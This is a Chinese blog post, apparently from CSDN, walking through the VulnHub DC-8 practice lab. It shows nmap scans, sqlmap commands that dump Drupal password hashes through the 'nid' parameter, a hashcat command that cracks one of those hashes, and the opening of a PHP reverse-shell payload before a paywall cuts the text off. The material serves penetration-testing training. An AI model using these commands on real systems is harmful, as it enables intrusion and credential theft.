vulnhub靶机-DC8-Writeup

最新推荐文章于 2023-08-30 17:18:01 发布
最新推荐文章于 2023-08-30 17:18:01 发布
阅读量1.9k 收藏
点赞数
分类专栏: 靶机 文章标签: 安全 web安全 渗透测试 靶机 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liuhanzhe/article/details/121846494
版权
本文是关于Vulnhub靶机DC8的渗透测试过程记录。首先介绍了DC8靶机的背景,强调了Linux技能和基本渗透测试工具的重要性。接着,通过nmap扫描发现开放的22和80端口。通过目录扫描和SQL注入,获取了Drupal网站的admin和john的密码hash,并使用hashcat解密得到john的密码。利用PHP代码设置回弹shell,成功获取到交互式shell。最后,通过sudo权限检查和suid文件利用,使用exim4的exploit提升至root权限,读取到flag。
摘要由CSDN通过智能技术生成

0x01 介绍

靶机地址:

https://www.vulnhub.com/entry/dc-8,367/

DESCRIPTION

DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This challenge is a bit of a hybrid between being an actual challenge, and being a “proof of concept” as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.

The “proof of concept” portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.

The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.

You probably wouldn’t even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it’s definitely there and doing it’s job.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

0x02 信息收集

nmap扫描ip

nmap -sP 172.16.89.0/24

在这里插入图片描述

发现ip:172.16.89.9,继续扫描

nmap -T5 -A -v -p- 172.16.89.9

扫描结果

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-06 22:54 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
Initiating ARP Ping Scan at 22:54
Scanning 172.16.89.9 [1 port]
Completed ARP Ping Scan at 22:54, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:54
Completed Parallel DNS resolution of 1 host. at 22:54, 0.00s elapsed
Initiating SYN Stealth Scan at 22:54
Scanning 172.16.89.9 [65535 ports]
Discovered open port 22/tcp on 172.16.89.9
Discovered open port 80/tcp on 172.16.89.9
Completed SYN Stealth Scan at 22:55, 5.53s elapsed (65535 total ports)
Initiating Service scan at 22:55
Scanning 2 services on 172.16.89.9
Completed Service scan at 22:55, 6.04s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 172.16.89.9
NSE: Script scanning 172.16.89.9.
Initiating NSE at 22:55
Completed NSE at 22:55, 0.46s elapsed
Initiating NSE at 22:55
Completed NSE at 22:55, 0.03s elapsed
Initiating NSE at 22:55
Completed NSE at 22:55, 0.00s elapsed
Nmap scan report for 172.16.89.9
Host is up (0.0013s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
MAC Address: 00:0C:29:E9:F7:C1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 199.639 days (since Sun Mar 21 07:35:43 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.30 ms 172.16.89.9

NSE: Script Post-scanning.
Initiating NSE at 22:55
Completed NSE at 22:55, 0.00s elapsed
Initiating NSE at 22:55
Completed NSE at 22:55, 0.00s elapsed
Initiating NSE at 22:55
Completed NSE at 22:55, 0.01s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.96 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

发现两个端口,22和80

0x03 渗透

浏览器登录,目标站点使用Drupal搭建

在这里插入图片描述

扫描目录,发现登陆界面:http://172.16.89.9/user,其他一些配置文件没有什么用

点击左侧连接发现存在参数nid

http://172.16.89.9/?nid=1

使用sqlmap扫描

sqlmap -u "http://172.16.89.9/?nid=1" --dbs
sqlmap -u "http://172.16.89.9/?nid=1" -D d7db --tables
sqlmap -u "http://172.16.89.9/?nid=1" -D d7db -T users --dump

发现admin和john密码hash

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

使用hashcat跑一下

echo "\$S\$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z" > dc8_pass.txt
echo "\$S\$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF" >> dc8_pass.txt
hashcat -m 7900 -a 0 dc8_pass.txt /usr/share/john/password.lst -o result.txt --show

在这里插入图片描述

跑出了john的密码turtle,在http://172.16.89.9/user下登陆,后台有一个设置php代码的地方

在这里插入图片描述

设置php回弹shell代码,在表单提交时触发

aaa
<?php

set_time_limit (0);
最低0.47元/天 解锁文章
含日
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 2982
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
Vulnhub靶机实战——DC-8
冠霖L的博客
10-30 3403
靶机DC-8下载地址:https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Kali的IP地址:192.168.220.155 DC-8靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155 ...
看完这篇 教你玩转渗透测试靶机vulnhub——DC8
Aluxian_的博客
04-07 2072
Vulnhub靶机DC8渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC8 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.c
VulnHub DC8
baynk的博客
05-22 328
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-8,367/ 下载地址2:https://pan.baidu.com/s/17t3sSa-7w81OT_RH7jGhqw 提取码: nqf6 只有一个flag,但是要bypass双因子认证,看来有新东西,而且有提示和ssh有关。 开肝。 0x02 渗透流程 nmap走起 还是先从80入手,直接访问 又是drupal,这是真爱啊。上面的Very important Message提示要维护网站。点着点着
nmap 扫描常见漏洞
热门推荐
hambaga的博客
11-09 1万+
加上 --script=vuln 参数就可以了 nmap -T4 -A -v 192.168.1.133 --script=vuln 扫描结果,发现了两个可用的漏洞 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-09 22:51 CST NSE: Loaded 149 scripts for scanning. NSE: Script Pr...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
ATK&ck靶场系列二
weixin_45778886的博客
08-30 243
ATK&CK
cpe解读 nmap_NMAP六种端口状态解读-转载
weixin_36025345的博客
02-15 394
转自:nmap把端口定义为六种状态的解读 - CSDN博客https://blog.csdn.net/novicecoder/article/details/52177234NMAP六种端口状态解读Nmap是一种用来发现网络中主机和服务的安全扫描工具,从而能够产生一个网络“地图”,为了完成这个功能,nmap会向每个目标主机发送特定的报文,从而从目标主机返回报文(或者无返回报文)来判断目标主机的属性...
nmap扫描工具安装使用介绍
fly0512的博客
11-22 1955
nmap扫描工具安装使用介绍 官网:https://nmap.org 这是一个开源的网络探测工具,可以快速扫描大型网络,也可对单一主机做全端口扫描。 源码安装nmap 在centos7.6上操作安装: cd /opt #下载nmap最新版本源码 wget https://nmap.org/dist/nmap-7.91.tar.bz2 参考官方说明安装: bzip2 -cd nmap-7.91.tar.bz2 | tar xvf - cd nmap-7.91 ./configure make su roo
nmap NSE脚本研究之二:脚本扫描阶段和执行rule函数
刘元林的博客
07-30 690
这一部分的东西可以耐心的看看,有利于理解NSE扫描原理和nmap原理。以下部分如有错误望指正。。 为了验证脚本扫描阶段和rule函数执行逻辑。。我写了一个小脚本,大家可以执行看看: #cattest.nse localstdnse=require"stdnse" prerule=function() stdnse.debug1("=======================prerule") returnnmap.is_privileged()and (st...
安全牛学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1615
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
小白日记12:kali渗透测试之服务扫描(二)-SMB扫描
ZiXuanFY的博客
09-12 1万+
SMB扫描 Server Message Block 协议。与其他标准的TCP/IP协议不同,SMB协议是一种复杂的协议,因为随着Windows计算机的开发,越来越多的功能被加入到协议中去了,很难区分哪些概念和功能应该属于Windows操作系统本身,哪些概念应该属于SMB 协议。因为该协议很复杂,所以是微软历史上出现安全问题最多的协议。 1、Nmap 最简单的方法:扫描其固定
vulnhub靶机-DC3-Writeup
liuhanzhe的专栏
12-08 338
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-3,312/ DESCRIPTION DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. As with the previous DC releases, this one is designed with beginn
Nmap-03:Nmap识别目标机器上服务的指纹
敲代码的乔帮主
09-15 5807
目录 1.服务指纹介绍 2.Nmap识别服务指纹 3.Nmap侵略性的探测 1.服务指纹介绍 为了确保有一个成功的渗透测试或者网络设备监控,必须需要知道目标系统中服务的指纹信息。服务指纹信息包括服务端口、服务名和版本等。 通过分析目标往Nmap中发送的数据包中某些协议标记、选项和数据,我们可以推断发送这些数据包的操作系统等。 Nmap通过向目标主机发送多个UDP与TCP数据包并分析其响应来进行操作系统指纹识别工作。 2.Nmap识别服务指纹 ...
端口扫描原理及工具 - 安全工具篇
chiqiao5151的博客
04-19 2185
"端口"是英文port的意译,可以认为是设备与外界通讯交流的出口。端口可分为虚拟端口和物理端口,其中虚拟端口指计算机内部端口,不可见。例如计算机中的80端口、21端口、23端口等。 一台拥有IP地址的主机可以提供许多服务,比如Web服务、FTP服务、SMTP服务等,这些服务完全可以通...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值